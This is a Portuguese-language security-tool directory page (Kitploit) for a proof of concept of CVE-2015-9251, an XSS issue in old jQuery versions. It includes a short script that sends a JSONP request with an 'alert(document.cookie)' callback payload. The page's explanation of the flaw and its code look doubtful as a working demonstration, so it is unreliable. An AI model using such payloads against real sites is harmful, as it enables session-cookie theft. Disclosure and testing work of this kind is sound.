Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2015-9251 — PoC para CVE-2015-9251 jQuery menor que 3.0.0. | Kitploit
Ferramentas/GitHubGitHub/moften/cve-2015-9251
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de Penetração
GitHubmoften/cve-2015-9251

CVE-2015-9251

PoC para CVE-2015-9251 jQuery menor que 3.0.0.

Ver Repositório
2há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2015-9251

[email protected]

PoC para CVE-2015-9251 jQuery menor que 3.0.0.

CVE-2015-9251 - PoC Exploit

Este repositório contém uma Prova de Conceito (PoC) para a vulnerabilidade CVE-2015-9251 na biblioteca jQuery. A vulnerabilidade permite um ataque de Cross-Site Scripting (XSS) por meio de chamadas JSONP sem sanitização, porque o jQuery permite a injeção de código no parâmetro callback em versões anteriores à 3.0.0.


Descrição

CVE-2015-9251 afeta versões do jQuery anteriores à 3.0.0. A vulnerabilidade é explorada ao manipular o parâmetro callback em uma solicitação JSONP, o que pode permitir a execução de código JavaScript arbitrário no navegador da vítima. Isso pode levar à exposição de dados sensíveis, como os cookies de sessão.

Requisitos

  1. Ambiente de Testes: A aplicação web vulnerável deve utilizar uma versão do jQuery menor que 3.0.0.
  2. Navegador Web: Para executar o PoC e observar o comportamento do exploit.
  3. Ferramenta de Inspeção: As DevTools do navegador serão úteis para ver os resultados.

Execução do PoC

Para executar o PoC, siga estes passos:

  1. Copiar e colar o código no console do navegador ou incluí-lo em uma página HTML de teste.

Código do PoC:

root@kitploit:~
<script src="https://code.jquery.com/jquery-1.11.3.min.js"></script>
<script>
  // Función que simula una solicitud a un servidor vulnerable
  $.ajax({
    url: "https://example.com/api?callback=alert(document.cookie)",
    dataType: "jsonp", // JSONP permite la ejecución de código en JSONP callbacks
    success: function(response) {
      console.log(response);
    }
  });
</script>
Baixar ferramenta